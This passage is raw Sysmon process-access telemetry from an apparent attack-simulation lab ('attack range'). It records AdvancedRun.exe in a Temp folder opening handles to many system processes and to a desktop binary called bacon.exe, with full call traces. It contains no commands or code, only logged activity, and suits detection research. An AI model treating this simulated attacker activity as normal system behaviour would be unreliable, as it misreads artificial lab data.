10341000x80000000000000002968293Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.719{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B90-61E7-4D06-000000002402}3064C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.719{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B8F-61E7-4906-000000002402}6604C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.719{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1A83-61E7-1306-000000002402}6808C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.719{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-19DC-61E7-B505-000000002402}7112C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1897-61E7-9802-000000002402}5612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1896-61E7-9302-000000002402}4112C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-181A-61E7-5902-000000002402}6116C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0FC8-61E7-5701-000000002402}4600C:\Users\Administrator\Desktop\bacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.718{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DCB-61E7-F900-000000002402}5304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968283Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-F100-000000002402}4980C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-F000-000000002402}4892C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968281Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-EE00-000000002402}4728C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E700-000000002402}4232C:\Windows\system32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E500-000000002402}4164C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E400-000000002402}4156C:\Windows\system32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.D